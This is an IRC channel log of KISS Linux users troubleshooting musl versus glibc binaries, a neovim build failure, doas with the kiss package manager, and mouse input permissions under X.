all the binaries are ELF binaries btw 2021-04-13T15:50:39 #kisslinux I doubt it but would it work if aliased /lib64/ld-linux-x86-64.so.2 to the musl one? 2021-04-13T15:50:41 #kisslinux oh 2021-04-13T15:50:43 #kisslinux did not know that 2021-04-13T15:50:51 #kisslinux musl is not abi compatible 2021-04-13T15:50:54 #kisslinux tch 2021-04-13T15:50:56 #kisslinux what are you trying to run 2021-04-13T15:51:10 #kisslinux I have two programs 2021-04-13T15:51:11 #kisslinux neovide 2021-04-13T15:51:15 #kisslinux and neovim 2021-04-13T15:51:24 #kisslinux both are binaries that just return not found 2021-04-13T15:51:53 #kisslinux yeah it sucks, most people dont bother providing a static binary 2021-04-13T15:56:40 #kisslinux don't tempt me 2021-04-13T15:56:48 #kisslinux > how do I execute elf binaries 2021-04-13T15:56:55 #kisslinux lol 2021-04-13T15:56:57 #kisslinux this gave me nightmares because I thought you disabled them in the kernel for a second 2021-04-13T15:57:43 #kisslinux I didn't realise that all binaries on linux are ELF 2021-04-13T15:58:29 #kisslinux if it ain't broke... 2021-04-13T15:59:46 #kisslinux lol in my case it is broke XD 2021-04-13T16:00:30 #kisslinux I don;t think I'm going to get neovim or neovide to build 2021-04-13T16:00:42 #kisslinux is it a bad idea to have musl and glibc at the same time? 2021-04-13T16:01:00 #kisslinux yes 2021-04-13T16:01:23 #kisslinux it will result in what people in the industry call "a bad time" 2021-04-13T16:01:45 #kisslinux I get the feeling you're underselling how bad a time I will have... 2021-04-13T16:02:08 #kisslinux I'm guessing there's not much else I can do 2021-04-13T16:02:12 #kisslinux real shame :( 2021-04-13T16:02:18 #kisslinux was looking forward to running with neovide 2021-04-13T16:02:25 #kisslinux I am not a salesman, just a bringer of bad omens 2021-04-13T16:02:48 #kisslinux I mean the jig isn't up, you can always just give in and package everything until somebody figures out what's happening... 2021-04-13T16:02:58 #kisslinux considering i'm the technical maintainer it's... my job :v 2021-04-13T16:03:11 #kisslinux can anybody else build neovim? maybe try using nightly just for fun 2021-04-13T16:03:19 #kisslinux Youll be fine with 2 libc in separate dirs in /usr 2021-04-13T16:03:20 #kisslinux btw would an appimage work? 2021-04-13T16:03:27 #kisslinux But only for standalone packages 2021-04-13T16:03:50 #kisslinux If a package has a dependency on say zlib, then you'll need zlib build for glibc aswell along with musl 2021-04-13T16:04:04 #kisslinux So you can only use it practically for linking small stuff 2021-04-13T16:04:33 #kisslinux probably definitely not 2021-04-13T16:04:52 #kisslinux Acheam or someone said that appimages link to glibc 2021-04-13T16:05:00 #kisslinux Dunno if they work after extracting manually 2021-04-13T16:05:49 #kisslinux They should.. 2021-04-13T16:17:05 #kisslinux to extract newer appimages, you have to run them to get the correct command line arguments to use with the mount command 2021-04-13T16:17:20 #kisslinux I think I linked the relevent documentation a few days ago 2021-04-13T16:18:47 #kisslinux Someone's having trouble building neovim on musl? I've built it once on Void (and Alpine has a package for it)... I didn't notice anything out of the ordinary 2021-04-13T16:19:08 #kisslinux trying to understand logs, what trouble are you having exactly? 2021-04-13T16:22:30 #kisslinux Some cmake and dependency issue stuff 2021-04-13T16:22:37 #kisslinux we need a translation layer between GH usernames, IRC usernames, GPG keys, and email adresses lol 2021-04-13T16:22:58 #kisslinux I'm alredy confused on who some of the people on the ML are 2021-04-13T16:23:04 #kisslinux I know, keybase! 2021-04-13T16:23:45 #kisslinux deer god I hope that you're kidding 2021-04-13T16:23:52 #kisslinux acheam what was the subscribe url again 2021-04-13T16:23:54 #kisslinux s/deer/dear 2021-04-13T16:23:59 #kisslinux i don't care about the god of buck 2021-04-13T16:24:07 #kisslinux testuser[m]_: dev+subscribe⊙ko 2021-04-13T16:26:23 #kisslinux Thanks 2021-04-13T16:26:57 #kisslinux acheam is one to talk :v 2021-04-13T16:27:35 #kisslinux kiedtl: the issue is (at least the obvious issue) that when building the bundled libluv, cmake doesn't understand --build 2021-04-13T16:28:08 #kisslinux dilyn: :) 2021-04-13T16:28:16 #kisslinux my online presence is very fractured 2021-04-13T16:28:36 #kisslinux i'm acheam some places, emptymessage others, armaanb here and there, armaan in a few places 2021-04-13T16:28:39 #kisslinux i just send a random message to that address right 2021-04-13T16:28:56 #kisslinux I would just send it with "subscribe" in the subject 2021-04-13T16:29:25 #kisslinux I think it does check the content, but I'm not sure what its filters are 2021-04-13T16:29:36 #kisslinux "subscribe" in the subject is the standard for mailing lists 2021-04-13T16:34:20 #kisslinux I think the body can be whatever 2021-04-13T16:34:30 #kisslinux I think I just put "test" or something 2021-04-13T16:34:42 #kisslinux when I first tried to subscribe I put in this long memey message and it didn't subscribe me 2021-04-13T16:34:54 #kisslinux lol 2021-04-13T16:34:57 #kisslinux serves you right 2021-04-13T16:34:59 #kisslinux It worked 2021-04-13T16:35:00 #kisslinux Nice 2021-04-13T16:35:02 #kisslinux yey 2021-04-13T16:35:04 #kisslinux the subjet and body can be blank 2021-04-13T16:35:06 #kisslinux or anything you want 2021-04-13T16:35:14 #kisslinux you could hide a secret message inside for me :o 2021-04-13T16:37:30 #kisslinux dilyn neovim fails for me. "Failed installing dependency" lua-term 2021-04-13T16:37:47 #kisslinux wowee 2021-04-13T16:39:25 #kisslinux hi mcpcpc-hkp 2021-04-13T16:41:30 #kisslinux kiedtl: how would you feel about a feature on movzbl where if you just joined a conversation, you can do !context, and it will message you the last 10 messages or something 2021-04-13T16:41:58 #kisslinux ahoi! 2021-04-13T16:42:07 #kisslinux hello claudia02 2021-04-13T16:42:16 #kisslinux I tried also to subscribe to the mailing list. Gmail does not let me :'( 2021-04-13T16:42:32 #kisslinux why? 2021-04-13T16:42:34 #kisslinux It says something the mailadress is not in the right format 2021-04-13T16:42:42 #kisslinux thats very very strange 2021-04-13T16:42:49 #kisslinux dev+subscribe(at)ko 2021-04-13T16:42:51 #kisslinux maybe because of the fragment? 2021-04-13T16:42:57 #kisslinux dumb gmail 2021-04-13T16:43:00 #kisslinux dev+subscribe⊙ko 2021-04-13T16:43:01 #kisslinux gmail-- 2021-04-13T16:43:21 #kisslinux is this some kind of link shortner, this ko? 2021-04-13T16:43:26 #kisslinux ko? 2021-04-13T16:43:47 #kisslinux k1sslinux.org... not "ko" 2021-04-13T16:43:52 #kisslinux you said 'dev+subscribe⊙ko' earlier 2021-04-13T16:43:52 #kisslinux dev+subscribe⊙ko 2021-04-13T16:43:58 #kisslinux ^^ 2021-04-13T16:43:59 #kisslinux reading the logs 2021-04-13T16:44:03 #kisslinux :p 2021-04-13T16:44:05 #kisslinux must've been a typo lol 2021-04-13T16:44:06 #kisslinux oh wait did I? 2021-04-13T16:44:12 #kisslinux oops 2021-04-13T16:44:45 #kisslinux i subbed fine from my gmail address! 2021-04-13T16:44:49 #kisslinux gmail loves my mailing list! 2021-04-13T16:44:55 #kisslinux acheam: the channel is logged, such a feature would be redundant. I believe dylan had a script in ~/bin/ which curl'd out stuff from the past hourish 2021-04-13T16:44:55 #kisslinux gmail must just hate you! 2021-04-13T16:44:56 #kisslinux :P 2021-04-13T16:45:08 #kisslinux I hate gmail! 2021-04-13T16:45:22 #kisslinux just build your own mailserver! 2021-04-13T16:45:24 #kisslinux ezclap 2021-04-13T16:45:41 #kisslinux :| 2021-04-13T16:45:45 #kisslinux kiedtl: yeah It was more for non-logged channels 2021-04-13T16:46:01 #kisslinux s/It was/the idea was aimed/g 2021-04-13T16:46:01 #kisslinux kiedtl: yeah the idea was aimed more for non-logged channels 2021-04-13T16:46:09 #kisslinux sounds like a good way to get your bot b&... 2021-04-13T16:46:15 #kisslinux Uh, message was send. 2021-04-13T16:46:35 #kisslinux what dilyn said, if the channel isn't logged then I strongly doubt such a bot would be allowed 2021-04-13T16:46:37 #kisslinux acheam: 2021-04-13T16:46:40 #kisslinux hmm yeah 2021-04-13T16:46:56 #kisslinux something something muh privacy 2021-04-13T16:47:33 #kisslinux Yeah. If you're not in the channel, people rightly assume you'll never see the messages they post. 2021-04-13T16:48:06 #kisslinux it's a cute feature though. I'd use it just so i can stop scrolling :v 2021-04-13T16:49:00 #kisslinux lol yeah 2021-04-13T16:49:58 #kisslinux for some reason scrolling backwards doesn't work in my tmux-ssh-irc client setup 2021-04-13T16:50:14 #kisslinux too many levels 2021-04-13T16:50:15 #kisslinux like, it scrolls backwards, but the text gets all overlappy and stuff 2021-04-13T16:50:24 #kisslinux so I have to ctrl-L every time I scroll back 2021-04-13T16:50:30 #kisslinux indeed, too many levels 2021-04-13T16:50:36 #kisslinux I'm on ssh-tmux-irc, no problems here 2021-04-13T16:51:11 #kisslinux Ah the logbot just make @k1sslinux.org to "@ko" very strange. 2021-04-13T16:51:44 #kisslinux no it definitely showed up that way in the channel 2021-04-13T16:51:58 #kisslinux maybe that's why the message didn't go 2021-04-13T16:52:00 #kisslinux :o 2021-04-13T16:52:19 #kisslinux y 2021-04-13T16:53:14 #kisslinux https://freenode.logbot.info/kisslinux/20210413#c7618971 2021-04-13T16:53:47 #kisslinux At least the logbot.info cannot be used to crawl adresses for spam 2021-04-13T16:56:03 #kisslinux oh wow damn yeah that's cool 2021-04-13T16:56:05 #kisslinux thanks logger 2021-04-13T16:56:17 #kisslinux now watch me plaster it everywhere on the internet anyways 2021-04-13T16:58:39 #kisslinux ^ 2021-04-13T16:59:21 #kisslinux s /^/^^ 2021-04-13T17:02:02 #kisslinux i think the problem with neovim is that... it doesn't configure libluv first... 2021-04-13T17:02:20 #kisslinux like it doesn't run cmake -DLUA_COMPATWHATEVER && cmake --build . 2021-04-13T17:06:45 #kisslinux I don't know if there's a good way to intercept it, but you can probably do something like... 2021-04-13T17:07:14 #kisslinux sed -i 's/compat-5.3 --build/compat-5.3 && /usr/bin/cmake --build ./' .deps/build.ninja 2021-04-13T17:08:57 #kisslinux lmao try setting CMAKE_GENERATOR=ninja and installing samurai, and then just building it 2021-04-13T17:16:54 #kisslinux kiedtl: hmm strange because i've had this scrolling issue even on weechat as well, so exact same setup as you 2021-04-13T17:17:04 #kisslinux maybe I just have a crappy connection and it gets out of sync or something 2021-04-13T17:17:05 #kisslinux huh 2021-04-13T17:17:28 #kisslinux ? 2021-04-13T17:18:35 #kisslinux dilyn: doas works for other things yes, but not kiss. 2021-04-13T17:19:03 #kisslinux I'm super happy with spectrwm, no more need for tmux with this (so far at least) 2021-04-13T17:23:09 #kisslinux I use tmux for preserving sessions, not for multiplexing 2021-04-13T17:23:12 #kisslinux spectrwm is great 2021-04-13T17:23:22 #kisslinux (writing a webpage about it now) 2021-04-13T17:23:37 #kisslinux well, not about it in particular, just window managers in general 2021-04-13T17:23:47 #kisslinux check out abduco, it's tmux but without the multiplexing 2021-04-13T17:24:09 #kisslinux huh that's really cool thanks 2021-04-13T17:24:28 #kisslinux will give it a shot later 2021-04-13T17:24:31 #kisslinux https://github.com/neovim/neovim/pull/12676 it's the same bug as the one dylan already fixed? but why... hm 2021-04-13T17:24:38 #kisslinux I like the idea of separating the two concepts 2021-04-13T17:26:37 #kisslinux sending from abduco 2021-04-13T17:36:15 #kisslinux I only multiplexed because I wanted to be able to have multiple terminals in my terminals since I liked to fullscreen my terminal emulator so I could maximise my screen real-estate 2021-04-13T17:36:29 #kisslinux but with spectrw I don't need to 2021-04-13T17:37:06 #kisslinux and I get the bonus of being able to treat firefox and other apps like a terminal pane or even run more graphical programs instead of terminal vim/neovim 2021-04-13T17:37:16 #kisslinux like neovide (were it working of course :( ) 2021-04-13T17:37:44 #kisslinux I'm currently editing my .spectrwm.conf file :p 2021-04-13T17:38:03 #kisslinux and I set my file manager to ranger 2021-04-13T17:38:17 #kisslinux so now I jsut have to do MOD+Shift+f and I get a file explorer/manager 2021-04-13T17:38:32 #kisslinux course since it's a terminal program I have to run it through my terminal but I can live with that 2021-04-13T17:39:09 #kisslinux I definetly love that I only have what I have with Kiss, since I use ranger no need for graphical file manager 2021-04-13T17:43:01 #kisslinux https://www.phoronix.com/scan.php?page=news_item&px=X.Org-Server-1.20.11 2021-04-13T17:49:37 #kisslinux okay. temporary fix for neovim 2021-04-13T17:50:20 #kisslinux change the source to https://github.com/0x777/neovim/tree/luv-1.34.2-2 2021-04-13T17:50:26 #kisslinux `kiss c && kiss b` 2021-04-13T17:56:59 #kisslinux dilyn: got any ideas why does wont work for kiss? 2021-04-13T17:57:09 #kisslinux *doas 2021-04-13T17:58:26 #kisslinux do you have other privilege escalations programs besides su? 2021-04-13T17:58:30 #kisslinux this is my conf http://ix.io/2VXO 2021-04-13T17:59:16 #kisslinux damn dylins got some low security 2021-04-13T17:59:26 #kisslinux good luck gettin' in :v 2021-04-13T17:59:32 #kisslinux Hello 2021-04-13T17:59:40 #kisslinux still, if I do get it, I can run pretty much anything via kiss 2021-04-13T17:59:46 #kisslinux Fellow linux developers what do you think of uring 2021-04-13T18:00:02 #kisslinux just add a malicious package to your kiss path and i'm good to go 2021-04-13T18:00:11 #kisslinux they say it's like linux kqueue 2021-04-13T18:00:17 #kisslinux i mean if I were worried about arbitrary code execution I... would never connect to the internet 2021-04-13T18:00:18 #kisslinux never heard of it before 2021-04-13T18:00:45 #kisslinux it's a new think on linux 5 apparently 2021-04-13T18:01:16 #kisslinux qemu uses it 2021-04-13T18:02:07 #kisslinux Use ssu for maximum security 2021-04-13T18:02:26 #kisslinux what 2021-04-13T18:02:39 #kisslinux That was for acheam 2021-04-13T18:02:42 #kisslinux oh 2021-04-13T18:03:10 #kisslinux I tried ssu but I like a config file 2021-04-13T18:03:24 #kisslinux and some amount of granularity 2021-04-13T18:03:26 #kisslinux wait is dylan back? dilyn? 2021-04-13T18:03:30 #kisslinux haha no 2021-04-13T18:03:35 #kisslinux different person 2021-04-13T18:03:40 #kisslinux oh 2021-04-13T18:06:33 #kisslinux sorry, what is uring? 2021-04-13T18:06:39 #kisslinux it sounds familure 2021-04-13T18:08:16 #kisslinux epoll on steroids 2021-04-13T18:08:27 #kisslinux like a linux kqueue 2021-04-13T18:08:53 #kisslinux I honestly have no opnion 2021-04-13T18:09:16 #kisslinux quick question, can you run picom + spectrwm at the same time? 2021-04-13T18:09:19 #kisslinux yes 2021-04-13T18:10:14 #kisslinux picom is compton right? 2021-04-13T18:10:18 #kisslinux yes 2021-04-13T18:10:42 #kisslinux except picom is many a commit ahead of compton by now 2021-04-13T18:11:43 #kisslinux depends on which compton you're really talking about 2021-04-13T18:11:50 #kisslinux There's xcompmgr. Btw if you don't need much fancy stuff 2021-04-13T18:11:57 #kisslinux the OG compton 2021-04-13T18:12:52 #kisslinux thanks testuser_[m] 2021-04-13T18:12:52 #kisslinux if you have intel graphics, I've found that using xf86-video-intel works so well that I don't need a compositor at all 2021-04-13T18:13:05 #kisslinux uh oh you mentioned xf86 2021-04-13T18:13:28 #kisslinux get your fire extinguishers ready folks 2021-04-13T18:13:43 #kisslinux ? 2021-04-13T18:13:47 #kisslinux lol 2021-04-13T18:13:47 #kisslinux lol if you're using X of any kind you're using an xf86-video-something, even if it's modesetting 2021-04-13T18:13:56 #kisslinux well xorg of any kind specifically I gues 2021-04-13T18:13:57 #kisslinux guess* 2021-04-13T18:13:59 #kisslinux if the driver supports your hardware, it's fine to use 2021-04-13T18:14:02 #kisslinux but on linux what else would you be using 2021-04-13T18:14:09 #kisslinux `mesa` 2021-04-13T18:14:31 #kisslinux (I mean what other X impl would you be using than xorg, not like "what other than X would you be using" cuz obviously wayland exists) 2021-04-13T18:14:33 #kisslinux yeah whoops I called the wrong part of that message to attention in my message 2021-04-13T18:14:58 #kisslinux Btw E5ten https://github.com/kiss-community/kiss/issues/5 added some info here 2021-04-13T18:15:07 #kisslinux I use vayland 2021-04-13T18:15:12 #kisslinux austrian fork of wayland 2021-04-13T18:16:05 #kisslinux I only ask because it doesn't seem to do anything 2021-04-13T18:16:56 #kisslinux also finished configuring spectrwm (for now :p ) 2021-04-13T18:17:01 #kisslinux that would depend on 1) how you're starting it and 2) how you're configuring it 2021-04-13T18:17:23 #kisslinux i'm starting it in .xinitrc before i start spectrwm 2021-04-13T18:17:46 #kisslinux afk 2021-04-13T18:17:52 #kisslinux got some shopping to do 2021-04-13T18:17:56 #kisslinux are you sure its still running? Maybe it is quitting because a bad config or something 2021-04-13T18:17:59 #kisslinux `pgrep picom` 2021-04-13T18:18:00 #kisslinux see ya 2021-04-13T18:41:22 #kisslinux dylin: i dont have anything besides su, should i? 2021-04-13T18:45:01 #kisslinux back 2021-04-13T18:45:34 #kisslinux nak 2021-04-13T18:50:21 #kisslinux flak 2021-04-13T18:54:58 #kisslinux you shouldn't, but some people default to immediately installing sudo. just checking. 2021-04-13T18:55:13 #kisslinux s/*/whack/ 2021-04-13T18:55:13 #kisslinux you shouldn't, but some people default to immediately installing sudo. just checking. 2021-04-13T18:55:15 #kisslinux sry 2021-04-13T18:55:50 #kisslinux it is very weird how kiss doesn't detect firefox in any repo when running with doas 2021-04-13T18:55:57 #kisslinux but if i change to root then it does 2021-04-13T18:56:35 #kisslinux what are you doing doas kiss s firefox? 2021-04-13T18:56:41 #kisslinux s/what/wait/ 2021-04-13T18:56:42 #kisslinux wait are you doing doas kiss s firefox? 2021-04-13T18:56:50 #kisslinux doas kiss b firefox 2021-04-13T18:56:52 #kisslinux oh 2021-04-13T18:56:53 #kisslinux don't do that 2021-04-13T18:56:54 #kisslinux lmao 2021-04-13T18:56:58 #kisslinux what's wrong with `sudo` ? 2021-04-13T18:57:04 #kisslinux my kiss install wouldn't connect to the internet and I had thought I fucked it up somehow, started to have depression, but later realized I didnt put in the lan cable... 2021-04-13T18:57:11 #kisslinux im used to typing doas 2021-04-13T18:57:12 #kisslinux just kiss b firefox. kiss does privilege escalation on its own via KISS_SU 2021-04-13T18:57:16 #kisslinux i use openBSD 2021-04-13T18:57:19 #kisslinux ah 2021-04-13T18:57:20 #kisslinux okay 2021-04-13T18:57:26 #kisslinux ez fix haha 2021-04-13T18:57:29 #kisslinux lmfao 2021-04-13T18:57:47 #kisslinux it's a big departure from traditional linux package managers 2021-04-13T18:57:52 #kisslinux thats neat 2021-04-13T18:57:55 #kisslinux lol zenomat, was going to suggest if you had dchcpd running 2021-04-13T18:57:56 #kisslinux thermatix: nothing is wrong with sudo 2021-04-13T18:57:56 #kisslinux its very small too 2021-04-13T18:58:12 #kisslinux im very used to just typing doas instead 2021-04-13T18:58:17 #kisslinux i use openbsd on my other laptop 2021-04-13T18:58:23 #kisslinux thermatix: was my first thought as well^^ restarted it and everything, checked my kernelmodules 2021-04-13T18:58:41 #kisslinux yeah, I added dchcpd to the init script in rc.d 2021-04-13T18:58:46 #kisslinux so now it always starts 2021-04-13T18:58:49 #kisslinux but not x 2021-04-13T18:58:57 #kisslinux I've set it so I manually start it 2021-04-13T18:59:00 #kisslinux see i always forget to run `sudo pacman` and just run `pacman` so this is very natural for me 2021-04-13T18:59:09 #kisslinux yeah, i have dhcpcd start as a service via busybox 2021-04-13T18:59:12 #kisslinux I find it faster to type my login at the terminal and then manually start x 2021-04-13T18:59:21 #kisslinux how did you do that? 2021-04-13T18:59:32 #kisslinux you can put startx in for example your .profile 2021-04-13T18:59:45 #kisslinux https://k1sslinux.org/wiki/init/busybox 2021-04-13T18:59:51 #kisslinux thermatix: ln -s /etc/sv/dhcpcd /var/service 2021-04-13T18:59:59 #kisslinux that's it? 2021-04-13T19:00:09 #kisslinux huh 2021-04-13T19:00:23 #kisslinux i also do my login in the tty, but have my .profile set to start x when tty is equal to 1, got it from the arch wiki 2021-04-13T19:00:25 #kisslinux i'm telling you; KISS is the easiest distro I've ever used 2021-04-13T19:00:43 #kisslinux maybe I should remove dhcpcd from init and move it into the services folder... 2021-04-13T19:00:51 #kisslinux dilyn: indeed, kiss is pretty easy when you get over the kernel stuff for the first time 2021-04-13T19:01:07 #kisslinux I almost agree 2021-04-13T19:01:15 #kisslinux thermatix: i had it in my rc.d too in the beginning, but then the boot time was a lot longer than with the service 2021-04-13T19:01:26 #kisslinux hmmm 2021-04-13T19:02:37 #kisslinux got any ideas why kiss 'Cannot create a temporary directory in /tmp�'? 2021-04-13T19:02:56 #kisslinux ls -l / ? 2021-04-13T19:03:10 #kisslinux tmp does exist 2021-04-13T19:03:11 #kisslinux /tmp should be https://k1sslinux.org/wiki/init/busybox 2021-04-13T19:03:17 #kisslinux ope 2021-04-13T19:03:23 #kisslinux drwxrwxrwt 2021-04-13T19:03:26 #kisslinux 1777 2021-04-13T19:05:04 #kisslinux oh, 2021-04-13T19:05:33 #kisslinux i remember someone said you can replace grep for faster installs, was it replace busybox grep with gnugrep? 2021-04-13T19:05:45 #kisslinux Yes, I believe so 2021-04-13T19:05:58 #kisslinux yeah you just do kiss a gnugrep /usr/bin/grep 2021-04-13T19:06:01 #kisslinux after installing gnugrep 2021-04-13T19:06:09 #kisslinux spryc: https://k1sslinux.org/package-manager#8.1 2021-04-13T19:06:20 #kisslinux it used to be an envvar but when the alternatives system was added, it was dropped in favor of taking advantage 2021-04-13T19:06:26 #kisslinux zenomat I don't think you should consider 'kernel stuff' as part of kiss when comparing it to other distributions. Kernel stuff will always be there if you want to do it, you can replace your kernel even on Mint, right? Of course, you can also use a default kernel from another distribution in Kiss which could save a lot of time if you don't want to 2021-04-13T19:06:27 #kisslinux configure it yourself 2021-04-13T19:06:50 #kisslinux god, i have been slacking with RTFM lately... 2021-04-13T19:07:00 #kisslinux the site has a lot of content 2021-04-13T19:08:11 #kisslinux tink: I guess, it still is one of the steps to get kiss to even start, so I would count it, but I get your point 2021-04-13T19:08:50 #kisslinux dilyn do you like keeping the wiki as small as possible or would you like to add in information on other software etc. 2021-04-13T19:09:34 #kisslinux always open to more pull requests! simple pages are best pages, things that don't wholly reproduce other wiki's is ideal 2021-04-13T19:10:09 #kisslinux think, 'specific to KISS', as the guiding principle. 2021-04-13T19:12:21 #kisslinux what about device-specific kernel config entries in the wiki? is thinkpad there because it is very popular among kiss users / what dylan used or such pages are wanted? 2021-04-13T19:13:47 #kisslinux I think it was put there as an example of 'kernel config help for broad types of machines and popular types' 2021-04-13T19:13:56 #kisslinux for instance there was a draft AMD Ryzen page that nobody ever filled in 2021-04-13T19:14:38 #kisslinux well that's wierd 2021-04-13T19:15:19 #kisslinux that's ominous 2021-04-13T19:17:34 #kisslinux back 2021-04-13T19:17:37 #kisslinux properly 2021-04-13T19:19:00 #kisslinux thanks for the tip zenomat, works better now 2021-04-13T19:19:18 #kisslinux eyy, I contributed^^ no problem 2021-04-13T19:19:33 #kisslinux gkiss is actually so simple after installed 2021-04-13T19:19:39 #kisslinux not g 2021-04-13T19:19:42 #kisslinux whats gkiss? 2021-04-13T19:19:44 #kisslinux oh 2021-04-13T19:19:45 #kisslinux normal kiss 2021-04-13T19:19:45 #kisslinux lol 2021-04-13T19:19:50 #kisslinux kissy kissy XD 2021-04-13T19:19:52 #kisslinux but there is such things 2021-04-13T19:19:53 #kisslinux kiss glibc 2021-04-13T19:19:53 #kisslinux normal kiss with glibc 2021-04-13T19:19:55 #kisslinux as gkiss 2021-04-13T19:20:30 #kisslinux but kiss is easy when installed, xorg, alsa everything just werks! 2021-04-13T19:21:01 #kisslinux https://www.youtube.com/watch?v=YPN0qhSyWy8&vl=en 2021-04-13T19:21:11 #kisslinux :d 2021-04-13T19:21:14 #kisslinux :D 2021-04-13T19:24:21 #kisslinux because kernel config is not specific to kiss, i can't decide if anything related to it would fit into the wiki. i had to dig through a lot and spend a few days just to get my touchpad working, for instance. if there were a related guide on the wiki, it would make it a lot easier but that's true for all wikis including the gentoo one. 2021-04-13T19:25:59 #kisslinux mmhmm 2021-04-13T19:26:09 #kisslinux a lot of the kernel config is more trial and error than anything 2021-04-13T19:26:32 #kisslinux well, perhaps an external resource list might be usefull? 2021-04-13T19:26:51 #kisslinux not kiss specific but extremely helpfull to have them all in one spot 2021-04-13T19:46:30 #kisslinux Speaking of thinkpad wiki, thanks to whoever wrote the thinkpad page. I found it useful when I was installing 2021-04-13T19:54:30 #kisslinux Hei @ you do groff right 2021-04-13T19:54:44 #kisslinux Do you know how to put a caption on a table 2021-04-13T19:55:15 #kisslinux It looks like the hdtbl preprocessor can do it easily but I literally can't find the program itself anywhere 2021-04-13T19:55:23 #kisslinux Just the same manpage lol 2021-04-13T20:02:29 #kisslinux wow imagine unironically using roff 2021-04-13T20:03:21 #kisslinux this post made by pandoc gang 2021-04-13T20:04:55 #kisslinux pandoc gang assemble 2021-04-13T20:05:51 #kisslinux re wiki kernel config: IMO it would be nice to have more devices like touchpad listet there. At the moment this section looks pretty sparse. Maybe when more sections pop up, more user would contribute? 2021-04-13T20:07:28 #kisslinux Even if its input devices -> touchpads -> "my so hard to configure touchpad", this would be pretty usefull. 2021-04-13T20:08:44 #kisslinux yeah like the fact that my macbook pro only needs two options enabled for the trackpad AND the keyboard to work because it all runs off the single mouse driver 2021-04-13T20:08:51 #kisslinux sneaky secrets abound 2021-04-13T20:10:18 #kisslinux Imagine how long you looked on *the internet* to find those valuable options v 2021-04-13T20:10:22 #kisslinux :v 2021-04-13T20:11:53 #kisslinux btw dilyn, sometimes your sarcasm takes a lot of my brain power to process. 2021-04-13T20:15:51 #kisslinux I said I was done for the day customising stuff... 2021-04-13T20:15:56 #kisslinux and now I'm back at it >_< 2021-04-13T20:24:06 #kisslinux i'm trying to build something that requires cmake and installs by default to /usr/local 2021-04-13T20:24:39 #kisslinux so i passed it -DCMAKE_INSTALL_PREFIX=/usr 2021-04-13T20:24:55 #kisslinux and they have the build scripts set to accept that... and ignore it 2021-04-13T20:25:35 #kisslinux they obviously know better than you 2021-04-13T20:25:41 #kisslinux claudia02: sarcasm? hmm 2021-04-13T20:26:11 #kisslinux acheam: still not sure if I'm using it unironically or not 2021-04-13T20:29:50 #kisslinux lol 2021-04-13T20:30:24 #kisslinux what things do i have to do other than install xf86-input-libinput for mouse input to work? 2021-04-13T20:31:12 #kisslinux what kind of mouse are you using 2021-04-13T20:31:37 #kisslinux and is your user a member of the group input? 2021-04-13T20:31:55 #kisslinux i am a member of the group input, it is a logitech g102 usb mouse 2021-04-13T20:32:59 #kisslinux does it show up under `lsusb` output 2021-04-13T20:33:30 #kisslinux yep it does 2021-04-13T20:34:37 #kisslinux and when you start x, do you have any mouse movement/input at all? 2021-04-13T20:35:22 #kisslinux i do not 2021-04-13T20:38:22 #kisslinux i wonder if you'll need to poke around linux-firmware for a driver 2021-04-13T20:38:37 #kisslinux i dont think so 2021-04-13T20:38:48 #kisslinux if i run cat /dev/input/mouse1 it shows input 2021-04-13T20:39:05 #kisslinux so its just X 2021-04-13T20:40:59 #kisslinux are there any errors showing up in your X server log? 2021-04-13T20:43:53 #kisslinux xf86openserial: cannot open device /dev/input/event18. Permission denied 2021-04-13T20:43:57 #kisslinux could be a permission issue 2021-04-13T20:44:19 #kisslinux it does that for all input devices 2021-04-13T20:45:01 #kisslinux it fails to create devices for them because permission denied? 2021-04-13T20:45:06 #kisslinux sounds like your keyboard works ok? 2021-04-13T20:45:12 #kisslinux keyboard works yes 2021-04-13T20:45:53 #kisslinux might be a dumb question, but have you rebooted or logged out and back in? 2021-04-13T20:46:05 #kisslinux yes i have 2021-04-13T20:46:45 #kisslinux mouse input works when i start x as root... 2021-04-13T20:47:54 #kisslinux now what do i need to change for the permissions of U/dev/input? 2021-04-13T20:48:08 #kisslinux these are the current ones: http://0x0.st/-TD2.txt 2021-04-13T20:49:02 #kisslinux you shouldn't need to change any of those 2021-04-13T20:49:23 #kisslinux mouse input should work fine with x started as non-root 2021-04-13T20:50:22 #kisslinux ls -l /dev/input ? 2021-04-13T20:50:31 #kisslinux ah 2021-04-13T20:50:36 #kisslinux hmmmmmhmmm 2021-04-13T20:51:11 #kisslinux you have libinput installed, yes? lol 2021-04-13T20:51:17 #kisslinux yeah 2021-04-13T20:51:26 #kisslinux last week I somehow ended up with xf86-input-libinput but not libinput 2021-04-13T20:51:29 #kisslinux libinput and xf86-input-libinput 2021-04-13T20:53:28 #kisslinux just so weird how i can use my mouse as expected when running x as root 2021-04-13T20:53:55 #kisslinux then yeah that's strictly just a permissions issue 2021-04-13T20:54:17 #kisslinux and you're sure your user has the right uid:gid and is in all the right groups with no typos? 2021-04-13T20:54:52 #kisslinux my user is in wheel audio video and input 2021-04-13T20:54:54 #kisslinux kiedtl is abusing drewlang 2021-04-13T20:55:03 #kisslinux and a group that is just his name 2021-04-13T20:55:34 #kisslinux are you actually interested in it? 2021-04-13T20:56:17 #kisslinux I don't really see what is so good in it that it is worth the practical tradeoffs of using a langauge that only 15 people have ever used 2021-04-13T21:01:18 #kisslinux >is abusing drewlang 2021-04-13T21:01:19 #kisslinux ?? 2021-04-13T21:03:32 #kisslinux spryc what device manager are you using? 2021-04-13T21:03:56 #kisslinux mdev / eudev / other ? 2021-04-13T21:05:22 #kisslinux acheam: I'm trying out the language, in order to see 1) whether the obvious defects really matter that much and 2) to compare it to Zig. 2021-04-13T21:05:38 #kisslinux If I'm favorably impressed, who knows, I might use it instead of C occasionally when the language matures 2021-04-13T21:05:58 #kisslinux and yes, obviously give that the thing is *very* pre-alpha I doubt even 15 people have used it :P 2021-04-13T21:06:05 #kisslinux s/give/given 2021-04-13T21:06:07 #kisslinux s/give/given/ 2021-04-13T21:06:07 #kisslinux and yes, obviously given that the thing is *very* pre-alpha I doubt even 15 people have used it :P 2021-04-13T21:29:57 #kisslinux i am using eudev 2021-04-13T21:30:17 #kisslinux wait 2021-04-13T21:30:23 #kisslinux actually im using libudev-zero 2021-04-13T21:30:45 #kisslinux i just followed the install instructions for that 2021-04-13T21:38:12 #kisslinux is a reboot consistent in which device nodes get root-only permissions applied? 2021-04-13T21:41:02 #kisslinux kiedtl: makes sense 2021-04-13T21:41:50 #kisslinux uhm i dont know, should i use eudev instead tho? 2021-04-13T21:41:55 #kisslinux apparently touchpad (possibly applies to a mouse as well) click action and moving the pointer are handled by separate things. when i was trying to get my touchpad to work, i was able to switch between 